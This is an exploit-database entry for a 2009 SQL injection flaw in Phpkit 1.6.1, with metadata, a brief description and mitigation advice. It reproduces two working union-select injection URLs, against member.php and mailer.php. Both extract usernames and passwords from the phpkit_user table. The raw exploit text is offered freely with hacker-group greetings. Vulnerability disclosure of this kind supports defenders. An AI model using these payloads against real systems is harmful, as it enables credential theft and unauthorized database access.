header-logo
Suggest Exploit
vendor:
phpkit
by:
ea$y laster
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: phpkit
Affected Version From: 1.6.1
Affected Version To: 1.6.1
Patch Exists: NO
Related CWE: N/A
CPE: a:phpkit:phpkit:1.6.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Phpkit 1.6.1 SQL Injection member.php

The vulnerability exists due to insufficient filtration of user-supplied data passed via the 'searchstr' parameter to '/include.php' script. A remote attacker can execute arbitrary SQL commands in application's database, cause denial of service, access or modify sensitive data, exploit various vulnerabilities in the underlying SQL server software, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied data should be filtered and/or validated before being used in SQL queries.
Source

Exploit-DB raw data:

 ########################################################################
 ##Phpkit 1.6.1 SQL Injection member.php                               ##
 ########################################################################
 ########################################################################
 ## _                     _     _                   _                  ##
 ##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_                ##
 ##|  _| -_| .'|     |___| |   |  _| -_|  _|   | -_|  _|               ##
 ##|_| |___|__,|_|_|_|   |_|_|_|_| |___|_| |_|_|___|_|                 ##
 ##                                                                    ##
 ########################################################################
##########################################################################
#Script: Phpkit 1.6.1 SQL Injection member.php                           #
#Vulnerabilities [ SQL Injection ]                                       #
#Language: [ PHP ]                                                       #
#Download: [ this script is for free]                                    #
#Founder: [ ea$y laster ]                                                #
#Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ]  #
#[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=-]                       #
#############################################################################
/include.php?path=login/member.php&searchstr=+union+select+1,1,1,1,1,1,     #
concat(user_name,0x3a,user_pw),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,   #
1,1,1,1,1,1,1,1+from+phpkit_user+where+user_id=2#                           #
############################################################################# 

 ########################################################################
 ##Phpkit 1.6.1 SQL Injection mailer.php                               ##
 ########################################################################
 ########################################################################
 ## _                     _     _                   _                  ##
 ##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_                ##
 ##|  _| -_| .'|     |___| |   |  _| -_|  _|   | -_|  _|               ##
 ##|_| |___|__,|_|_|_|   |_|_|_|_| |___|_| |_|_|___|_|                 ##
 ##                                                                    ##
 ########################################################################
##########################################################################
#Script: Phpkit 1.6.1 SQL Injection mailer.php                           #
#Vulnerabilities [ SQL Injection ]                                       #
#Language: [ PHP ]                                                       #
#Download: [ this script is for free]                                    #
#Discovered by : [ ea$y laster ]                                         #
#Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ]  #
#[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=-]                       #
#############################################################################
/include.php?path=login/mailer.php&userid=+union+select+1,1,1,1,1           #
,1,concat(user_name,0x3a,user_pw),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,          #
1,1,1,1,1,1,1,1,1,1,1,1,1+from+phpkit_user+where+user_id=1#                 #
#############################################################################